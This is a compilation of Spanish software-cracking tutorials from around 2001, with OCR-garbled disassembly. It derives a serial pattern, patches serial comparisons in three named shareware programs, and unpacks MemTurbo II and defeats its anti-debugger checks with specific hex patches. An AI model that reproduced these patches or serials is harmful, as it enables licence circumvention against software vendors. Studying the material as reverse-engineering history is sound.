vez F12 y nos aparece la messagebox diciendonos que nuestro codigo es erroneo, damos click en 
OK! y saltamos otra vez a el SICE ahi damos F12 dos veces mas y caemos en la siguiente direccion 
de memoria: 


:0049C002 33C0 xor eax, eax 
una vez ahi vamos a subir unas cuantas lineas hasta llegar a esta parte del codigo: 


:0049BF7F ES64FEFFFF call 0O49BDES 
:0049BF84 84C0 test al, al 
:0049BF86 7462 je OO49BFEA 


como pueden ver aqui se encuentra una comparación y un salto condicional, esperen no vayan y 
cambien ese salto ya que si lo hacen solo haran que salga el mensaje de REGISTRATION CODE 
ACCEPTED, pero cuando reinicien el programa seguiran sin registrar, si se fijan hay una 
comparación y arribita una CALL que les parece si ponemos un breakpoint en la dirección de 
memoria 49BF7F y veamos lo que pasa ahi adentro....jejejejje.....insertemos un nuemrod e codigo 
falso como la primera vez y demos CONTROL D y pongamos BPX 49BF7F y despues damos control d 
y regresamos al programa y ahora si damos click en OK! y saltamos inmediatamente a esa dirección 


de memoria, en la cual caemos en la siguente parte del codigo de esa call y damos f10 hasta llegar 
a: 


:0049BEA4 8B06 mov eax, dword ptr [esi] 

:0049BEA6 E85181F6FF call 0O403FFC <--- esta call saca la longitud del codigo insertado y la 
devuelve en EAX 

:0049BEAB 83F80C cmp eax, 0000000C <---- compara la longitud obtenida den EAX con OCH que 
en decimal es 12 

:OO49BEAE 7C43 jl 0049BEF3 <------ Salta al mensaje de error si es menor a 12 el codigo de registro 
insertado 

:0049BEBO 8B06 mov eax, dword ptr [esi] <---- el acumulador EAX lleva nuestro codigo si es igual a 
12 


como podemos ver esto se pone mas interesante cada vez que avanzamos, 
jejejejeje........ CONTINUEMOS ..... 


:0049BEB2 803837 cmp byte ptr [eax], 37 <---- compara el primer caracter del codigo insertado con 37H que es 7 
:0049BEB5 753€ jne 0049BEF3 <---- salta si al mensaje de error si no es igual 

:0049BEB7 8B06 mov eax, dword ptr [esi] 

:0049BEB9 80780130 cmp byte ptr [eax+01], 30 <---- compara el segundo caracter del codigo insertado con 
30H que es O :0049BEBD 7534 ¡ne 0049BEF3 <---- salta si al mensaje de error si no es igual 
:0049BEBF 8B06 mov eax, dword ptr [esi] 

:0049BEC1 80780233 cmp byte ptr [eax+02], 33 <---- compara el tercer caracter del codigo insertado con 33H 
que es 3 

:0049BEC5 752C ¡ne 0049BEF3 <---- salta si al mensaje de error si no es igual 

:0049BEC7 8B06 mov eax, dword ptr [esi] 

:0049BEC9 80780330 cmp byte ptr [eax+03], 30 <---- compara el cuarto caracter del codigo insertado con 30H 
que es 0 :0049BECD 7524 ¡ne 0049BEF3 <---- salta si al mensaje de error si no es igual 

:0049BECF 8B06 mov eax, dword ptr [esi] 

:0049BED1 80780436 cmp byte ptr [eax+04], 36 <---- compara el quinto caracter del codigo insertado con 36H 
que es 6 :0049BED5 751€ ¡ne 0049BEF3 <---- salta si al mensaje de error si no es igual 

:0049BED7 8B06 mov eax, dword ptr [esi] 

:0049BED9 80780949 cmp byte ptr [eax+09], 49 <---- compara el decimo caracter del codigo insertado con 49H 
que es | 

:0049BEDD 7514 ¡ne 0049BEF3 <---- salta si al mensaje de error si no es igual 

:0049BEDF 8B06 mov eax, dword ptr [esi] 

:0049BEE1 80780443 cmp byte ptr [eax+0A], 43 <---- compara el onceavo caracter del codigo insertado con 
43H que es C 

:0049BEE5 750€ ¡ne 0049BEF3 <---- salta si al mensaje de error si no es igual 

:0049BEE7 8B06 mov eax, dword ptr [esi] 

:0049BEE9 80780B53 cmp byte ptr [eax+0B], 53 <---- compara el doceavo caracter del codigo insertado con 
53H que es S 

:0049BEED 7504 ¡ne 0049BEF3 <---- salta si al mensaje de error si no es igual 

:0049BEEF B301 mov bl, 01 

:0049BEF1 EBO7 ¡mp 0049BEFA 


bueno amigos aqui les traduje las instrucciones de como compara y genera el serial verdadero para 
lo acepte y ser usuario ""registrado"" entonces queda así: 


70306****| CS 


los asteriscos significan que del caracter 6 al 9 puedes poner cualquier numero, ya que el programa 
solo verifica los espacios del 1 al 5 y del 10 al 12, asi que ahora si probemos si sirve nuestra teoria 


Information 


1) Thank you for support | 


AHORA SI PODEMOS DECIR PROGRAMA CRACKEADO......... 


| Saludos | 


Saben que es lo mas gratificante en este medio de las investigaciones sobre protecciones que 
vulgarmente se le llama CRACKI NG aparte de obtener cada día mas y mas conocimientos y la 
satifación que se siente al poder con una protección, pues es la variedad de personalidades y 
amistades que uno va conociendo y haciendo con el tiempo, las cuales de alguna forma auque no 
las conoscas en persona o mucho menos en foto, les vas tomando aprecio, ya que éstas te van 
haciendo la vida mas facil y amena durante el tiempo que quieras permanecer en esto de el estudio 
de protecciones, asi vas entablando una amistad muy reconfortante conciertas personalidades de 
este medio, como les decia anteriormente conoce uno a muchas personas y quisiera aprovechar a 
mandar un saludo a mis mejores amigos, sin orden de preferencia , no espero romper algunas 
sencibilidades: 


Skuater : """" mi gran maestro """" 
Dek_OIN """"Estamos Locos ... jejejejjee....'""" 
Kuato Thor """" Compañero de mil batallas, don quijote y sancho panza ..... jejejje""""" 
ActMAgo """" Sigue asi.....""" 
Karpoff """"" El guru de las protecciones """"" 
Txeli """ COMPADRE Y AMIGO """" 
e Todo el DREAM TEAM de la Compilación de Tutoriales 2001 CdT2001 :) 


e Saludos a todos los crackers del mundo 


| Nota: | 


e Soy humano y cometo errores, si encuentras uno házmelo saber OK. 


e Si deseas bajar la última versión de la compilación puedes hacerlo de aquí: Compilación de Tutoriales v 


3.5 


e Si deseas aparecer en la compilación envía tu tutorial a: profesor_xGhotmail. com 


Espero que hayan disfrutado leyendo este tutorial y que les sirva para incrementar sus habilidades, pero 


recuerden, lean muchos tutoriales, practiquen, estudien y CRACKEAR será mucho más fácil. 
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Karpoff Spanish Tutor 


Programa: Parches "inteligentes" :-) 


PROTECCION: Name / Serial. 

Objetivo: Registrarse con el serial correcto sin saber cual es :-) 
Dificultad: Principiante++. 

Herramientas: Softice, W32dasm, Editor Hexadecimal. 

CRACKER: CaoS ReptantE FECHA: 20/09/2001 


INTRODUCCION 


Este es, según se hagan las cuentas, mi tutorial número 13. Me temo que no es gran cosa pero se trata de 
romper la maldición y poder pasar al siguiente ;-) El sistema que propongo aquí es el de buscar una 
alternativa para esos programas (de los que - por suerte o por desgracia - cada vez hay menos) en los que la 
decisión entre chico bueno y chico malo se toma confrontando los dos seriales: el chungo, introducido por 
nosotros y el correcto, calculado por el programa. En este caso, lo más sencillo es hacer un parche, para 
que el programa acepte cualquier número. Aquí vamos a tratar de hacer que el programa se registre con el 
serial correcto, haciendo que el programa copie éste en el lugar donde está situado el serial chungo. ¿Que 
ventaja tiene el hacer esto cuando ya hemos encontrado el serial correcto? Una es que, si un colega quiere 
evaluar el programa sin prisas ;-) no es necesario que él lo tenga registrado a nuestro nombre, sino que lo 
puede tener registrado al suyo, sin que para ello tengamos que rastrear con el Softlce, buscándole su serial. 
Otra ventaja es que una vez registrados con el serial correcto, podemos substituir el programa parcheado 
por el programa original. Veremos unos ejemplos con unos cobayas que se prestan a esta manipulación, ya 
que este sistema, como os podéis suponer, no se puede aplicar a cualquier programa. A esto me refiero 
pues, al hablar de parches "inteligentes" ;-) 


AL ATAKE 


Programa: Icon Extractor 3.4 


Descripcion: Creo que el nombre es lo bastante explícito :) 


DOWNLOAD : http: //www.gregorybraun.com/1CONX32.ZTP 


Estos programas de Software by Design van bien para cuando se está deprimido, se crackea alguno de ellos y ya está :- 
D claro que ahora que ByTESCRACK ha hecho un keygen polivalente para todos sus programas, las cosas ya no serán 
como antes :-( De todos modos, como únicamente se trata de mostrar el funcionamiento del parche inteligente, este 
programa nos sirve. Ejecutamos el programa con el Softlce agazapado, vamos a Help/Register y le introducimos un 
serial chungo para intentar registrarnos. Antes de aceptar, ctrl+D para entrar en el Slce, introducimos un breakpoint, mi 
favorito: bpx hmemcpy, FS5 para salir de Slce y OK para registrarnos. Salta el Slce, le damos dos veces más a FS para 
que el programa lea las otras ventanas de texto y ocho o nueve veces a F12 hasta que aparecemos en: 


:0040DE61 5F pop edi 


A partir de aquí, debemos ver lo que hace el programa con nuestro serial chungo. Averiguaremos la posición o 
posiciones que ocupa en la memoria nuestro número, mediante la instrucción s 0 1 f£ffffff 'serial_chungo'. A 
continuación, empleando las instrucciones bpm dirección_obtenida r o bpr inicio_dirección_obtenida 
final_dirección obtenida r sabremos cuando el programa lee nuestro número para compararlo con el correcto. Vamos 
dándole a F5 para continuar cuando el Slce se detiene, pero al fin, vemos como en EAX y EBX se están formando 
unos números. Finalmente, en EBX aparece nuestro serial pasado a hexadecimal. Es conveniente utilizar como serial, 
un número que nos resulte fácilmente reconocible, tanto en formato decimal como hexadecimal. Ahora sólo falta llegar 
a la comparación de seriales, lo que ocurre aquí: 


:00407D98 3BD8 cmp ebx, eax 
:00407D9A 5F pop edi 
:00407D9B 741D je 00407DBA 
:00407D9D 68CFEAOO00O push O000EACF 
:00407DA2 6888130000 push 00001388 


Podemos comprobar que en EBX está nuestro serial chungo en hexadecimal, y en EAX, el serial correcto. Ahora 
vamos a parchear, pero no para que el programa acepte la comparación, sino que vamos a copiar el serial correcto en el 
lugar donde está nuestro serial chungo. Como la comparación en estas condiciones, resultará positiva, el código que 
hay a continuación del salto, no llegará a ejecutarse, por lo que podemos utilizarlo para nuestros siniestros propósitos :- 


) 


:00407D98 EB03 jmp 00407D9D 


:00407D9A 5F pop edi 
:00407D9B 741D je 00407DBA 


:00407D9D 8BD8 mov ebx, eax 
:00407D9F 3BD8 cmp ebx, eax 
:00407DA1 EBF7 jmp 00407D9A 


Si, ya sé que es una chapuza, pero funciona y hace posible que quedemos registrados con el número correcto, como 
podemos comprobar en el propio programa y en el registro (HKEY_USERS Y .DEFAULT Y Software | Software by 
Design Y Icon Extractor for Windows 95/NT | Registration). Ya tenemos uno, vamos a por el siguiente... 


Programa: AltoMP3 Maker 3.02 
Descripcion: Para pasar CDs de música a MP3 


DOWNLOAD : http://www.yuansoft .com/altom302.zip 


Aquí el procedimiento para llegar a la comparación de seriales, es muy parecido y no lo vamos a ver con detalle, 
bastará con decir que llegamos a la comparación entre seriales aquí: 


:0042A944 
:0042A946 
:0042A948 
:0042A94A 
:0042A94C 
:0042A94E 
:0042A950 
:0042A952 
:0042A955 
:0042A958 
:0042A95A 
:0042A95C 
:0042A95E 
:0042A961 
:0042A964 
:0042A966 


8A1l0 
8A1lE 
SACA 
3AD3 
751E 
84C9 
7416 
8A5001 
8A5E01 
SACA 
3AD3 
750E 
83C002 
83C602 
84C9 
75DC 


mov 
mov 
mov 


dl, byte ptr 
bl, byte ptr 
el; «al 

cmp dl, bl 

jne 0042A96C 

test el, el 

je 0042A968 

mov dl, byte ptr 
mov bl, byte ptr 
mov cl, dl 

cmp dl, bl 

jne 0042A96C 

add eax, 00000002 
add esi, 00000002 
test cl, cl 

jne 00424944 


[eax] 
[esi] 


[eax+01] 
[esi+01] 


Como en el caso anterior, modificaremos la rutina de comprobación para que se copien los bytes del serial correcto 
(dirección señalada por EAX) en el lugar de los del serial chungo (dirección indicada por ESD. 


:0042A944 
:0042A946 
:0042A948 
:0042A94A 
:0042A94C 
:0042A94E 
:0042A950 
:0042A952 
:0042A955 
:0042A958 
:0042A95A 
:0042A95C 
:0042A95E 
:0042A961 
:0042A964 
:0042A966 


8A1l0 
8816 
8ACA 
3AD2 
751E 
84C9 
7416 
g8A5001 
885601 
8ACA 
3AD2 
750E 
83C002 
83C602 
84C9 
75DC 


mov 
mov 
mov 


dl, byte ptr [eax] 
byte ptr [esil], dl 
cl, dl 
cmp dl, dl 
jne 0042A96C 
test. el, el 
je 0042A968 
mov dl, byte 
mov byte ptr 
mow cl, dal 
cmp dl, dl 
jne 0042A96C 
add eax, 00000002 
add esi, 00000002 
test cl, cl 

jne 00424944 


ptr [eax+01] 
[esi+01], dl 


Como en el caso anterior, quedaremos registrados con el serial correcto como podemos comprobar en el propio 
programa y en el archivo REGKEYCR.INI. De todos modos, lo más curioso de este programa es que tiene ¡23! rutinas 
iguales a esta. ¿Para que servirán? ¿Para despistar? No creo que sean tan zoquetes. Yo no he visto otro camino para 
registrarse que el que he seguido, pero si alguien descubre algo sobre esto, le agradecería me lo hiciera saber. Bueno ya 
tenemos dos, vamos a por el tercero... 


Programa: 


Descripcion: 


DOWNLOAD : 


Super Cleaner 2.21 Víctima cedida gentilmente por ByTESCRK ;-) 


Como su nombre indica, hace la limpieza. 


(del PC, claro) 


http: //www.southbaypc.com/download/cleansetup.exe 


En este caso es aún más sencillo encontrar el código de la comparación. El problema es que está en muy mal sitio, ya 
que se hace en KERNEL32... y no vamos a tocar ahí por razones obvias :-( Así que como conocemos el lugar donde 
sitúa el código correcto, vamos a pillar al programa cuando lo escribe, de nuevo mediante la instrucción bpr. Así 
localizamos el call que coloca el serial correcto en su sitio. 


:0040C59D E8AE000000 call 0040C650 

:0040C5A2 8B8C2414010000 mov ecx, dword ptr [esp+00000114] 
:0040C5A9 83C408 add esp, 00000008 

:0040C5AC 8D442404 lea eax, dword ptr [esp+04] 
:0040C5B0 50 push eax 

:0040C5B1 51 push ecx 


* Reference To: KERNEL32.1strcmpA, Ord:0329h 


:0040C5B2 FF15F8914100 Call dword ptr [004191F8] 


Como no tenemos espacio para colocar nuestro código vamos a buscar un espacio vacío al final de la sección y 
colocaremos una instrucción jmp para saltar a él. Sería más limpio poner un call, pero esto nos complicaría mucho la 
vida porque como podéis ver, todas estas instrucciones están relacionadas con la pila. Modificamos el código que 
quedará así: 


:0040C59D E8AE000000 call 0040C650 

:0040C5A2 8B8C2414010000 mov ecx, dword ptr [esp+00000114] 
:0040C5A9 83C408 add esp, 00000008 

:0040C5AC E91BCAOODO jmp 00418FCC 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :00418FE3 (U) 


:0040C5B1 51 push ecx 


* Reference To: KERNEL32.1strcmpA, Ord:0329h 


:0040C5B2 FF15F8914100 Call dword ptr [004191F8] 


Como he dicho antes, colocaremos nuestro parche en el final de la sección: 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :0040C5AC (U) 

:00418FCC 50 push eax 

:00418FCD 53 push ebx 

:00418FCE 51 push ecx 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :00418FD9 (U) 

| 
:00418FCF 8A18 mov bl, byte ptr [eax] 
:00418FD1 8819 mov byte ptr [ecx], bl 
:00418FD3 OADB or bl, bl 

:00418FD5 7404 je 00418FDB 

:00418FD7 40 inc eax 

:00418FD8 41 inc ecx 

:00418FD9 EBF4 jmp 00418FCF 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :00418FD5 (C) 

| 

:00418FDB 59 pop ecx 

:00418FDC 5B pop ebx 

:00418FDD 58 pop eax 

:00418FDE 8D442404 lea eax, dword ptr [esp+04] 

:00418FE2 50 push eax 


:00418FE3 E9C935FFFF jmp 0040C5B1 


Creo que está claro el funcionamiento. En todo caso diré que los push y pop son para que los valores de los registros 
sean los mismos al volver al código "normal" (hay que tener cuidado del orden en que se ponen) y que las dos 
últimas instrucciones antes del jmp de regreso son las que nos hemos "comido" para poner el jmp que nos ha traído 
aquí. El programa así parcheado, nos registra con el serial correcto (ver en el registro: HKEY_CURRENT_USERA 
Software 1 SuperCleaner | Registration) por lo que, una vez registrados, podemos deshacernos de él. Haced que 
parezca un accidente :-D 


¿Cuál es la manera más sencilla de ensamblar este código? Para mí, lo más fácil es hacerlo con el Softlce, colocando 
un bpx a la dirección de la primera instrucción a ensamblar (en este último caso: bpx 40c5ac), e introduciendo a 
continuación, la instrucción o instrucciones correspondientes (¡mp 00418FCC), finalizando con <esc> o un doble 
<return>. Luego se busca el siguiente código a ensamblar mediante F10, y se repite la operación. Esto tiene dos 
ventajas: la primera es que el Slce se encarga de codificar las instrucciones, calculando además la distancia relativa 
de los saltos, algo engorroso de hacer a mano (aparte de que es fácil equivocarse); la segunda es que, traceando con 
F10 las instrucciones que hemos ensamblado, podemos ver su ejecución paso a paso y detectar fácilmente los 
posibles errores (se trata de utilizar el Soflce como debugger que era su utilidad original, antes de que unos 
individuos sin escrúpulos ;-) se dedicaran a crackear programas con él). Como no hay rosa sin espinas, hay también 
un inconveniente: los cambios efectuados con el Softlce, se hacen en la memoria, por lo que hay que tomar nota de 
los códigos de las instrucciones para pasarlos al programa mediante un editor hexadecimal. Os recuerdo que la 
dirección que se le ha de indicar al editor es el offset, el cual se puede ver en la línea inferior del W32dsam, junto a 
la dirección de la instrucción sobre la que estamos. 


Podréis pensar que es mucho código para tan poco programa, pero en este tuto he tratado únicamente de buscar una 
alternativa para cierto tipo de programas a los que se puede dar un "tratamiento" distinto del habitual. Además estos 
trapicheos nos darán algo de práctica, que nos valdrá para empresas más ambiciosas. 


Para elaborar los parches podéis fabricaros un parcheador o utilizar alguno de los existentes. Yo utilizo el 
ScAEvoLa's PatchEngine. 


Como siempre, quiero recordaros que debéis pagar los programas que utilicéis regularmente. No estaría bien que 
condenarais al hambre a unas buenas gentes, mientras vosotros os gastáis el dinero a manos llenas en actividades 
viciosas y de más que dudosa moralidad ;-) 


Por último, quiero agradecer a ByTESCRK su colaboración en este tuto y enviar un saludo a mis amigos Act Mago, 
PrfEsOr X, DeK_OIiN, Karpoff, Silver Storm, KuaTo_ThoR, y vLuGo. 


Si queréis alguna aclaración sobre mis tutos, mi dirección de e-mail es: caos_reptante O hotmail.com 
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Karpoff Spanish Tutor 1999-2001 


MEMTURBO II 


Empakado, Anti-Sice, CRC-32, Limitación de uso a 30 días. 
Fragmentar MemTurbo. 

Recuperar RAM ocupada inútilmente por Windows. 
Avanzadillo. 

http://www.memturbo.com 


Softice 3.24, FrogSice, Procdump32, File insPEctor XL, W32dasm 8.9, ExeScope v6.00, un 
editor Hex. 


Arkanian FECHA: 01/09/2001 


INTRODUCCION 


Esta nueva versión de MemTurbo trae un montón de novedades en cuanto a nuestro campo de investigación 
se refiere. Así como la versión anterior, la 1.5, venía a "pelo", parece que los chicos de Shareware 
OnLine.com , Inc. han espabilado y han intentado hacer las cosas un poco mejor. 


Estas son las dificultades que nos vamos a encontrar: 


1. .- Programa empakado/comprimido y anti-dasm. 
2. .- Anti-Sice mediante Meltlce, BoundsChecker y llamadas a la INT3. 

.- Comprobaciones de integridad del archivo aleatorias durante la ejecución del programa. 
3. .- Encriptación de las cadenas de texto "delicadas". 


Interesante programa a fe mía, amigo Sancho... 


Vamos alla... 


"Per aspera ad astra" 


AL ATAKE 


Instalar el programa y lo primero es lo primero, la talla XL del File insPEctor, Compilador UPX 1.05-1.07, un vistazo 
a las secciones y a sus características, rápidamente Procdump y cambiamos la UPXO a E0000020 por si las moscas, de 
paso nos apuntamos el Entry Point y el Size of Image que nunca viene mal. Le echamos un vistazo a las funciones solo 
por curiosidad y ejecutamos el memturbo.exe. 


PRIMERAS SORPRESAS 


Iniciamos el programa y empiezan las sorpresas, pantallazo del Sice, no se qué del Windows requested break point, 
fallo de página, fallo general de protección y cuelgue de la maquina todo seguido. R- EXIT-C por este orden. 
Empezamos bien .... |:-( 


Al montar FrogSice nos encontramos con otra sorpresa, un aviso de modificaciones en la IDT. Algo ha tocado la Tabla 
de Descripción de Interrupciones y el Sice no funciona. El Loader dice que está activo pero es incapaz de cargar nada. 
Reiniciando que es gerundio... 


FrogSice y a ver que pasa... 


=> Memturbo 
** SOFTICE DETECTION ** code 0B, at cs:00404852 
Attempting to load: SICE (string ref at cs:0044D404) 


Esto de aquí arriba aparece 9 veces seguidas en el log del FrogSice. Tiene pintas de Meltlce. Parece que el programa 
funciona y que tenemos el Sice convenientemente oculto. Como uno nació desconfiado vamos a ver que ocurre con la 
opción "a prueba de balas": 


=> Memturbo 
** SOFTICE DETECTION ** code 0B, at cs:00404852 
Attempting to load: SICE (string ref at cs:0044D404) 


=> Memturbo 

** SOFTICE DETECTION ** code 01, at 0177:0040497C 
Interrupt:03h >eax=006C0004h ebx=0000044Ch ecx=006CF954h 
edx=BFF76859h esi=0121C290h edi=00000000h >ebp=4243484Bh 


SEH proc address at cs:0041A18C 


=> Memturbo 

** SOFTICE DETECTION ** code 00, at 0177:004049C8 
Interrupt:03h eax=0040038Fh ebx=0000044Ch ecx=006CF954h 
edx=BFF76859h esi=01211227h edi=00000000h ebp=006CF7DCh 


SEH proc address at cs:0041A18C 


=> Memturbo 

** SOFTICE DETECTION ** code 00, at 0177:004049C8 
Interrupt:03h eax=0040038Fh ebx=0000044Ch ecx=006CF954h 
edx=00000000h esi=01211227h edi=00000000h ebp=006CF768h 


SEH proc address at cs:0041A18C 


¡Toma pedazo de log!, todo esto vuelve a aparecer otras nueve veces seguidas. Vamos a analizarlo a ver que sacamos 
en claro: 


.- Attempting to load: SICE --> El truco Meltlce, por lo menos parte de él... ya veremos. 

.- > ebp = 4243484Bh --> BCHK. BoundsChecker seguido de una INT3. 

.- Interrupt: 03h --> Lo mismo que el anterior, intenta acceder a la INT3 dos veces antes de probar 
Meltice otra vez. y empezar el bucle. 


Nada fuera de nuestras posibilidades. :-) 


AL TAJO 


Desempakando a pedales 


Vamos a probar primero a desempacar el programa, siendo UPX no creo que haya mucha dificultad. Hemos cambiado 
las características de la sección UPXO, de E0000080 a E0000020 lo cargamos en el Loader y cuando rompa ponemos 
un BPX GETVERSION. 


ES y F12, hasta aparecer en una dirección 41 y pico, miramos un poco más arriba para encontrar un PUSH EBP - 
MOV EBP, ESP en 417860. Ya tenemos el Punto de entrada original. borramos el bp y ponemos otro en esa dirección. 
Salimos, quitamos el FrogSice, volvemos al Loader, FS y directamente a 417860 


Lo de siempre, quitar el bp, apuntar los bytes (558BEC6A), ensamblar a JMP EIP, Procdump, Dump full y Kill task, 
Hex editor, buscar E9FE, poner los bytes originales (558B), Procdump otra vez, cambiar el Entry Point a 00017860 y 
reconstruir la cabecera. El XL ya lo identifica como C++ v.6 y Tabla de Importaciones parece correcta... 


Eh... ¿Voy muy deprisa? 


Anti-debugging a mano 


Ya tenemos un ejecutable funcional, hora de cambiar cosas. Vamos a buscar las direcciones "calientes" en 00404852, 
0040497C y 004049C8. Como se puede comprobar una vez desensamblado con W32dasm, no hay informaciones de 
menús, ni de diálogos, ni de funciones ni de nada de nada y las String References parecen un bebedero de patos. 


El motivo de esto es parte de las strings del programa vienen en formato ancho en plan VB, ...eso las que no están 
encriptadas, otras en formato normal y las que quedan no sirven para mucho... Usaremos el ExeScope para ver por 
donde andamos. 


A lo que íbamos, echemos un vistazo a esto: 


* Referenced by a CALL at Addresses: 

1:0040462C , :00409AFC , :0040BABE , :0040BB81 , :0040BC6C 
1:0040BD3E , :0040BDA2, :0040BEDS , :0040BF5E , :0040BFC9 
1:0040C05D , :0040C140, :0040C1AE 

| 

:00404813 6408 push 00000008 --> Número de bytes a desencriptar. 
:00404815 59 pop ecx --> ECX = 8 


* Referenced by a (U)nconditional or (Cjonditional Jump at Address: 
1:0040482B(C) 


| 

:00404816 8A9104D44400 mov dl, byte ptr [ecx+0044D404] --> Un valor encriptado. 

:0040481C 8D8104D44400 lea eax, dword ptr [ecx+0044D404] --> Ponemos en EAX 44D404 + 8. 
:00404822 F6D2 not dl --> Poderosa técnica de encriptación. 

:00404824 8810 mov byte ptr [eax], dl --> Lo movemos al valor de EAX. 

:00404826 8BC1 mov eax, ecx --> El contador a EAX. 

:00404828 49 dec ecx --> Decrementa el contador. 

:00404829 85CO0 test eax, eax --> Comprobación del contador. 

:0040482B 7FE9 jg 00404816 --> Volvemos arriba. 


Aquí lo que va haciendo es desencriptar los valores de 44D404+8 hacia atrás. Poco a poco va apareciendo la cadena WM 
. YSICE. Observad la cantidad de sitios desde donde se llama a este código, la cantidad de comprobaciones que hace, 
...inutilmente. Seguimos: 


:0040482D 53 push ebx --> Guarda estos valores. 

:0040482E 55 push ebp 

:0040482F 56 push esi 

:00404830 8B3534C24300 mov esi, dword ptr [0043C234] --> La dirección de CreateFileA. 
:00404836 57 push edi 

:00404837 BB80000000 mov ebx, 00000080 

:0040483C 6A00 push 00000000 --> Nos vamos a haciendo hueco... 

:0040483E 53 push ebx 

:0040483F 6A03 push 00000003 --> Hum.... 

:00404841 6A00 push 00000000 --> Más espacio vital... 


:00404843 BF000000CO mov edi, CO0O0000O --> ¿Y esto?, ¿0028:C00000007. La cosa se pone caliente. 
:00404848 6A03 push 00000003 

:0040484A 57 push edi 

:0040484B 6803D44400 push 0044D404 --> Guarda la dirección de la cadena YA .A SICE. 

:00404850 FFD6 call esi --> Entramos en CreateFileA. 

:00404852 6A08 push 00000008 --> ¿Otra vez?, ¿Encriptamos o desencriptamos? 

:00404854 59 pop ecx --> El contador.. 


Ahora tendría que venir la comprobación de si ha encontrado el archivo... hay que esperar un poco, la cosa tiene miga: 


* Referenced by a (U)nconditional or (Cjonditional Jump at Address: 
1:0040486B(C) 

| 

:00404855 8A9104D44400 mov dl, byte ptr [ecx+0044D404] --> La dirección de antes. 
:0040485B 8DA904D44400 lea ebp, dword ptr [ecx+0044D404] --> Ahora en EBP. 
:00404861 F6D2 not dl --> Encriptamos con la poderosa tecnología NOT. 
:00404863 885500 mov byte ptr [ebp+00], dl --> Y lo guardamos. 

:00404866 8BD1 mov edx, ecx --> El contador [8]. 

:00404868 49 dec ecx --> Un byte menos. 

:00404869 85D2 test edx, edx --> Comrpueba si esta todo. 

:0040486B 7FES jg 00404855 --> Arriba si no es 0. 

:0040486D 83F8FF cmp eax, FEFEFFFE --> ¡Por fin! 

:00404870 7403 je 00404875 --> El salto de marras... 

:00404872 50 push eax 

:00404873 EB4D jmp 004048C2 --> Si llegamos aquí la jodimos... 


Esto es un ejemplo de la mayoría de los procesos del programa, desencripta las cadenas de texto que va a utilizar, hace 
lo que tenga que hacer y antes de acabar las vuelve a encriptar. 


Para no aburriros mucho, ya que es duro leerse el código, la siguiente comprobación que hace un poco más abajo, 
usando este mismo código, la hace con11. NICE. ¡Que bonito!. 


¿NICE no debería ser NTICE?, ¿Han ajustado la cadena al valor fijo de ECX que es 8?, Me parece que "alguien" ha 
metido la pata con esto. :-))) 


Vamos a liquidar esto de una manera elegante. Nada de cambiar saltos que es lo fácil, pensemos un poco, el resultado 
después de CreateFileA tiene que ser FFFFFFFF en EAX, la dirección de la cadena 11. |SICE la ha metido en la pila 
antes de entrar en esa función, (PUSH 44D404), una pequeña modificación nos permitirá salir con el valor de error 
esperado por el programa casi automáticamente. 


El valor de 44D403 es 00 (un byte antes), CreateFileA empieza a procesar una cadena que empieza con 00, como lo 
hace con un REPNZ salimos con un -1 en EAX rápidamente. Así que cambiamos PUSH 44D404 por PUSH 44D403 
(04 x 03). Fácil, ¿No?. 


Vamos con la siguiente dificultad, el BCHK: 


:0040496C 8965E8 mov dword ptr [ebp-18], esp 

:0040496F 8365FC00 and dword ptr [ebp-04], 00000000 

:00404973 BD4B484342 mov ebp, 4243484B --> Valor de la cadena BCHK. 
:00404978 66B80400 mov ax, 0004 --> Cambiar a JMP 0. 

:0040497C CC int 03 --> La putada. 

:0040497D 3C04 cmp al, 04 

:0040497F 7515 ¡ne 00404996 


Aquí la solución es ensamblar la linea 404978 mov ax, 0004 a JMP 0, de esta manera se produce una excepción y el 
programa pensará que no hay ningún Debugger que la maneje. 


De la misma forma solucionamos la última dificultad de la INT 3 en 4049C8: 


:004049B9 8965F0 mov dword ptr [ebp-10], esp 
:004049BC 8365FC00 and dword ptr [ebp-04], 00000000 
:004049C0 66BE2712 mov si, 1227 


:004049C4 66B88F03 mov ax, 038F --> Ensamblar esto a JMP 0. 
:004049C8 CC int 03 
:004049C9 EB16 ¡mp 004049E1 


Espero que hayas tomado nota de todos los cambios que hemos realizado, ahora toca ir al editor Hex y realizar las 
oportunas modificaciones: 


| DIRECCIÓN | OFFSET | VALOR | CAMBIARA 
| :0040484B |  00003E48 | 6804D444 | 6803D444 


:00404978 00003F78 | 66 B8 04 00 CC | * E9 83 B6 BF BF 
| :004049C4 00003FC4 66B88F03CC | E9 37 B6 BF FF 


[*] A mi también me extraña que el desplazamiento sea 83 B6 BF ¿BF? y no FF como el de abajo, pero así lo puso el Sice 
después de meter a mano el JMP 0. De todas formas funciona que es lo que queríamos. 


La fecha de caducidad 


Ya hemos "liberado" el programa y ya podemos dedicarnos a investigar tranquilamente cuando y donde hace la 
comprobación de tiempo transcurrido hasta que caduca. 


Sabemos de antemano, por que uno lee y se considera instruido, que el programa calcula el tiempo transcurrido a 
traves de una serie de comprobaciones en el Registro (vease, Karpoff - MemTurbo v1.5 - WKT Tutorialz Site - 1 de 
Diciembre de 1999), pero de algún sitio tendrá que coger la fecha actual, digo yo... 


Así que que por probar que no quede, le metemos un BPX GETSYSTEMTIME después de cargarlo en el Loader a ver 
que pasa. 


Esto: 


:0040BF23 FF1524C34300 call dword ptr [0043C324] --> Llamada a GetSystemTime. 
:0040BF29 8D45C8 lea eax, dword ptr [ebp-38] --> Aparecemos aquí. 

:0040BF2C 50 push eax 

:0040BF2D 8D45A0 lea eax, dword ptr [ebp-60] 

:0040BF30 50 push eax 

:0040BF31 FF1528C34300 call dword ptr [0043C328] --> Llamada a SystemTimeToFileTime 
:0040BF37 8D45C8 lea eax, dword ptr [ebp-38] 

:0040BF3A 50 push eax 

:0040BF3B 8D45CO0 lea eax, dword ptr [ebp-40] 

:0040BF3E 50 push eax 

:0040BF3F FF152CC34300 call dword ptr [0043C32C] --> LLamada a CompareFileTime. 
:0040BF45 85CO0 test eax, eax 

:0040BF47 7E6B jle 0040BFB4 

:0040BF49 833D18DD44001E cmp dword ptr [0044DD18], 0000001E --> Un cebo... ni caso. 
:0040BF50 7407 je 0040BFS59 --> ¡No tocar! 

:0040BF52 56 push esi 

:0040BF53 56 push esi 

:0040BF54 E82BB50000 call 00417484 --> A Kernel32!RaiseException. Este es nuevo. 
